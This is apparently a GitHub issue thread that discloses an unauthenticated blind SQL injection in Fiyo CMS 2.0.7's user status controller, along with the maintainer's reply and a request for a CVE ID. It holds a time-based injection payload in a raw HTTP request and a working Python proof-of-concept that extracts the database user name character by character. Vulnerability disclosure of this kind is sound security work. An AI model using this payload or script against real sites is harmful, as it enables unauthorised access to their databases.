New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
dapur\apps\app_user\Status.php $ _GET['stat'] $ _GET['id'] variable exists SQL injection vulnerability #7
Comments
|
ok thx very much, we will update soon with new DB connection and query :)
…On 21 July 2017 at 13:10, Rai4_1over ***@***.***> wrote:
Hello, I found that there are some problems with Fiyo CMS, hoping to help
you and your work
*Fiyo CMS version 2.0.7 There is a SQL injection vulnerability There is no
need to login in when exploiting this vulnerability*
*Code does not validate and validate $_GET ['stat'] $_GET ['id'] variables*
These two variables can be controlled by malicious attackers,
control the program execution process and the malicious string into the
database caused by SQL injection
File location: dapur/app/app_user/controller/status.php
(Https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/
apps/app_user/controller/status.php)
[image: image]
<https://user-images.githubusercontent.com/20392808/28450633-13ecfa92-6e1b-11e7-9890-c79b8046b586.png>
*http:// 127.0.0.1/FiyoCMS/ <http://127.0.0.1/FiyoCMS/> is the
installation path of the site program*
*Vulnerability Verification① (Send a SQL injection attack packet that
causes a response delay)*
Get_Url: http://127.0.0.1/FiyoCMS/dapur/apps/app_user/
controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
Referrer: http://127.0.0.1
Detailed http request packet
GET /FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0) HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Referer: http://127.0.0.1/FiyoCMS/
Cookie: Hm_lvt_2f11040b51649a178c3fc835fd60c6f1=1499412807,1499422916,1499519057,1499663544; PHPSESSID=l25a9dch25s6uhmpara5klmoo0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 0
*The response was delayed by 5 seconds*
[image: image]
<https://user-images.githubusercontent.com/20392808/28450876-ac081356-6e1c-11e7-837d-2f73c6f419df.png>
*Vulnerability Verification② (Use the python script for SQL injection
attacks and get the current database user name)*
Python poc code
import requests
import time
if __name__ == '__main__':
Target_url = 'http://127.0.0.1/FiyoCMS/'
print 'Began to guess the length of the database user name !!'
for x in range(50):
start_time = time.time()
payload = '''8899 or if(length(user())={x},sleep(2),0)'''.format(x=x)
headers = {'Referer': Target_url}
response = requests.get(
Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
headers=headers)
end_time = time.time()
if (end_time - start_time) > 1:
length = x
break
print 'The database user name length is {length} !!'.format(length=length)
print 'Start guessing the database username !!'
username = ''
for x in range(length + 1):
pay_str = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
for p in pay_str:
start_time = time.time()
headers = {'Referer': Target_url}
payload = '''8899 or if(substr(user(),{q},1)='{w}',sleep(2),0) '''.format(q=x, w=p)
response = requests.get(
Target_url + '/dapur/apps/app_user/controller/status.php?stat=1&id=' + payload,
headers=headers)
end_time = time.time()
if (end_time - start_time) > 1:
username = username + p
print username
break
print 'The database user name is {username}'.format(username=username)
[image: image]
<https://user-images.githubusercontent.com/20392808/28451007-65175e6a-6e1d-11e7-8d57-1fd89e46d1b8.png>
*Discoverer: Neusoft of Rai4over*
—
You are receiving this because you are subscribed to this thread.
Reply to this email directly, view it on GitHub
<#7>, or mute the thread
<https://github.com/notifications/unsubscribe-auth/ADAVXlbSv0pVvJ0ojEhIVAz-SexUzaPFks5sQEDZgaJpZM4Oe_wf>
.
|
|
@firstryan If it is convenient, please confirm another file to delete the problem, please help me apply cve-id, thank you very much |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your work
Fiyo CMS version 2.0.7 There is a SQL injection vulnerability
There is no need to login in when exploiting this vulnerability
Code does not validate and validate $_GET ['stat'] $_GET ['id'] variables
These two variables can be controlled by malicious attackers,
control the program execution process and the malicious string into the database caused by SQL injection
File location: dapur/app/app_user/controller/status.php
(Https://github.com/FiyoCMS/FiyoCMS/blob/master/dapur/apps/app_user/controller/status.php)
http:// 127.0.0.1/FiyoCMS/ is the installation path of the site program
Vulnerability Verification① (Send a SQL injection attack packet that causes a response delay)
Get_Url: http://127.0.0.1/FiyoCMS/dapur/apps/app_user/controller/status.php?stat=1&id=21+or+if(1,sleep(5),0)
Referrer: http://127.0.0.1
Detailed http request packet
The response was delayed by 5 seconds
Vulnerability Verification② (Use the python script for SQL injection attacks and get the current database user name)
Python poc code
Discoverer: Rai4over of Neusoft
The text was updated successfully, but these errors were encountered: